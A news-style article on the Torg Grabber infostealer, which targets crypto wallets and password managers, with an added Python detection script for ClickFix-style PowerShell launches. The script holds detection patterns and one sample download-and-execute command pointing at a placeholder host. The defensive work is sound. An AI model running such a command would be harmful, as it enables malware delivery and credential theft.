Crypto Wallets Under Siege: Inside the Ruthless Rise of Torg Grabber Infostealer
Subtitle: A new malware campaign is ransacking hundreds of crypto wallets and password managers, evolving faster than defenders can keep up.
Late last year, a silent predator began stalking the digital savannah, preying on the hopes (and wallets) of crypto enthusiasts worldwide. Its name: Torg Grabber. In just three months, this info-stealing malware has taken aim at an unprecedented array of browser extensions and wallets, outpacing security teams with its relentless evolution and technical cunning. For anyone storing tokens, passwords, or digital secrets online, the threat is no longer theoretical: it's at your doorstep.
The Anatomy of a Digital Predator
According to researchers at Gen Digital, Torg Grabber is no ordinary info-stealer. Its development has been frenetic: 334 unique samples surfaced between December 2025 and February 2026, each more sophisticated than the last. The malware first infiltrates victims through the so-called “ClickFix” technique, hijacking the clipboard and luring users into executing a booby-trapped PowerShell command. Once inside, it slips past defenses using layers of obfuscation, direct system calls, and reflective loading, running its payload entirely in memory to evade antivirus tools.
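The ClickFix chain described above leaves a characteristic trace: PowerShell started from the Run dialog (so its parent is explorer.exe) with a hidden window, a bypassed execution policy and a download-and-execute or encoded command. The following is an added detection example written for this article, not code from Gen Digital or from the malware; the record format is modelled loosely on a Sysmon process-creation event, and the sample records, thresholds and placeholder URL are constructed.

```python
"""Heuristic scoring of process-creation events for ClickFix-style PowerShell launches."""
import re
from dataclasses import dataclass

# Constructed heuristics: (indicator name, regex over the command line).
# Tune the list and the threshold to your environment before alerting.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I)),
    ("policy_bypass", re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I)),
    ("encoded_command", re.compile(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("download_cradle", re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b.*\|\s*iex\b", re.I)),
    ("invoke_expression", re.compile(r"\b(iex|invoke-expression)\b", re.I)),
]


@dataclass
class ProcEvent:
    parent_image: str   # Sysmon ParentImage
    image: str          # Sysmon Image
    command_line: str   # Sysmon CommandLine


def score_event(ev: ProcEvent) -> tuple[int, list[str]]:
    """Return (score, matched indicator names); non-PowerShell events score 0."""
    if not ev.image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0, []
    hits = [name for name, rx in INDICATORS if rx.search(ev.command_line)]
    # A lure pasted into Win+R is launched by explorer.exe, not by a terminal,
    # script host or management agent, so the parent itself is a signal.
    if ev.parent_image.lower().endswith("explorer.exe"):
        hits.append("explorer_parent")
    return len(hits), hits


def is_clickfix_like(ev: ProcEvent, threshold: int = 3) -> bool:
    """Flag an event when enough independent indicators co-occur."""
    return score_event(ev)[0] >= threshold


# Constructed sample records; c2.example.invalid is a placeholder, not a real host.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -ep bypass -c "iwr http://c2.example.invalid/p | iex"'),
    ProcEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -NoProfile -File C:\Scripts\inventory.ps1"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd /c dir"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        flagged, (_, hits) = is_clickfix_like(ev), score_event(ev)
        print(f"{flagged!s:5} {hits} <- {ev.command_line}")
```

Only the first sample trips the threshold; the scheduled administrative script and the unrelated cmd.exe launch score zero, which is the point of requiring several indicators to co-occur rather than alerting on any one of them.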
But Torg Grabber’s real menace lies in its scope. It targets 25 Chromium-based browsers and eight Firefox variants, scraping credentials, cookies, and autofill data. Its hit list reads like a who’s who of the crypto world: MetaMask, TrustWallet, Phantom, Coinbase, Binance, Exodus, TronLink, and hundreds more, including obscure wallets with only a handful of users. Password managers and authentication tools aren’t spared either, with LastPass, 1Password, Bitwarden, and dozens of others in its crosshairs.
The malware’s capabilities are chillingly comprehensive. It can fingerprint the host machine, inventory installed software (including antivirus tools), grab screenshots, and exfiltrate files from standard folders. Torg Grabber even packs the ability to execute custom shellcode delivered from its command-and-control servers, which are registered and cycled weekly to stay ahead of takedowns. A related tool, “Underground,” goes even further, injecting itself into browsers to extract encryption keys, a technique borrowed from other notorious stealers like VoidStealer.
Researchers have documented at least 40 operator “tags,” suggesting a growing cybercriminal ecosystem behind Torg Grabber. Its infrastructure is professional, its tactics evolving, and its targets expanding weekly. For users, the risk isn’t just about losing cryptocurrency; it’s about having every digital secret exposed in a matter of seconds.
Conclusion: A Wake-Up Call for the Digital Age
Torg Grabber is more than just another piece of malware; it’s a warning shot across the bow of anyone who relies on browser-based wallets, password managers, or digital authentication. As cybercriminals innovate, so too must defenders. In the escalating arms race for our digital lives, vigilance and proactive security are the only answers. The next evolutionary leap in malware is already here; will we be ready for the one after?
WIKICROOK
- Infostealer: An infostealer is malware designed to steal sensitive data, such as passwords, credit cards, or documents, from infected computers without the user's knowledge.
- Clipboard hijacking: Clipboard hijacking is when malware secretly changes copied data, like wallet addresses, to steal information or redirect funds without your knowledge.
- Reflective loading: Reflective loading executes code directly in memory, bypassing disk and standard detection, making it a popular technique for stealthy cyberattacks.
- Command: A command is an instruction sent to a device or software, often by a C2 server, directing it to perform specific actions, sometimes for malicious purposes.
- App: An app is a software program that performs specific tasks on digital devices. Security features like app-bound encryption help protect app data from unauthorized access.